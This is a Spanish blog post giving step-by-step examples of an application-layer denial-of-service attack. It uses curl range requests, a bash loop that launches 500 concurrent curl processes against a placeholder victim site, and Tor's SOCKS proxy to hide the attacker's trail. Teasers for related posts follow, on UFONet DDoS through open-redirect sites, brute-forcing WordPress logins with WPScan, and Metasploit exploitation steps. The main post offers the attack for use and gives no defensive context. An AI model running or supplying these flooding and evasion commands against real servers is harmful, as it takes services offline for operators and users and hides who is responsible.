Ir al contenido principal

Ejemplos de ataque DOS con Curl y Tor

Es posible realizar un ataque DOS (sin necesidad de que sea distribuído, sin herramientas especiales y con una conexión común), valiéndonos solamente de CURL para realizar miles de peticiones simultáneas  y TOR para ocultar nuestro rastro. Basicamente un ataque a la capa de aplicación.

¿Cómo? con curl, realizando múltiples peticiones por segundo y concurrentes, atacando al servidor web, aunque por lo general lo que termina consumiendo toda la memoria de la víctima es la base de datos que la web utiliza.

Un ejemplo simple sería el siguiente:

Enviamos 1000 peticiones con Curl:
curl -s "http://victima.com/algo.php?[1-1000]"

Si queremos que éstas peticiones sean a su vez concurrentes, entonces deberíamos poner en segundo plano cada llamada a curl tantas veces como concurrencias se necesiten. 

Ejemplo: 

curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"
curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"
curl -s "http://victima.com/algo.php?[1-1000]" &
pidlist="$pidlist $!"


O bien podemos automatizarlo con un FOR en bashscript:  en este caso realizamos 1000 peticiones con 500 peticiones concurrentes.

for i in `seq 1 500`; do
  curl -s http://victima.com/algo.php?[1-1000] & pidlist="$pidlist $!"
done



Por otro lado, utilizamos TOR para ocultar nuestro rastro, aunque ésto hace menos efectivo el ataque

La forma de hacder una petición con curl a travez del proxy de TOR es la siguiente:

curl --socks5-hostname 127.0.0.1:9150 http//victima.com

Por lo tanto si queremos hacer múltiples peticiones (utilizando el primer ejemplo de curl) a travez del proxy de TOR, sería algo como lo siguiente:
curl -s --socks5-hostname 192.168.0.1:9150 "http://victima.com/algo.php?[1-1000]"



¿Dudas o sugerencias?

Comentarios

Entradas populares de este blog

Ataque DDOS sin botnet ni zombies con UFONET

Este es un pequeño y breve review sobre Ufonet . Una interesante herramienta que permite realizar ataques distribuídos de denegación de servicios (DDOS) sin valerse de máquinas zombies ni botnets .  En su lugar, utiliza múltiples webs vulnerables a Open Redirect para simular una botnet y lograr un ataque distribuído. Como funciona Ufonet? La función de Ufonet es realizar ataques distribuídos desde webs vulnerables. Como primer paso, utiliza dorks de google / bing para encontrar webs vulnerables, luego nos permite lanzar el ataque valiéndonos del listado de webs encontradas y realizar el ataque, aunque también incluye la opción de descargar el listado de webs vulnerables provisto por otros usuarios. Permite además utilizar TOR (opcionalmente) para conectarnos a las webs vulnerables. Pro y Contras Como pros, se puede mencionar que se trata de una forma rápida y fácil para realizar un ataque distribuído sin costo de tiempo y principalmente sin necesidad de tener un ejércit...

Ataque por Fuerza Bruta a Wordpress

En éste pequeño tutorial mostraré como hacer un ataque de fuerza bruta   o bruteforce (es decir, probar muchas combinaciónes de usuario/clave por segundo) para obtener acceso en cualquier Wordpress .   No hace falta ser un "hacker" para ésta tarea ya que solo estamos utilizando una herramienta.  Publico éste tutorial con fines didácticos para que otros puedan probar la fortaleza de sus propios sitios y principalmente para concientizar de que nada es seguro en internet, a menos que nosotros lo hagamos seguro. Si bien existen infinidad de herramientas, o incluso hasta podríamos hacerlo manualmente con curl + bashscript,  el software por exclencia es WPScan y lo pueden bajar desde: https://github.com/wpscanteam/wpscan WPScan permite: listar vulnerabilidades, listar plugins, themes, y nombres de usuarios y principalmente realizar ataques de fuerza bruta de una forma sencilla y rápida. Al correr por primera vez WPScan nos pedirá actualizarlo en primer lug...

Resumen de comandos básicos de la consola en Metasploit

Lo siguiente es un resumen de la consola de Metasploit a  modo resumen/práctico o para quienes no deseen leerse toda la documentación. Se asume que el lector ya sabe qué es metasploit y ya lo tiene instalado o utiliza alguna distribución como Kali Linux o similar. Los pasos básicos de un ataque consisten basicamente en: obtención de información, análisis de vulnerabilidades, búsqueda de un exploit y explotación/penetración al sistema. Como explotar un sistema en 7 pasos utilizando Metasploit. Suponiendo que ya enumeramos los recursos del objetivo y sabemos que existe una parte vulnerable, procedemos a buscar un exploit. 1) Ingresamos a " msfconsole ", la consola de metasploit. 2) Buscamos un exploit para la vulnerabilidad requerida, con el comando " search "  ( help search para mas información ). 3) Una vez localizado un exploit, lo seleccionamos con el comando "use". Ej: use nombre_del_exploit 4) Vemos las opciónes de configuración del e...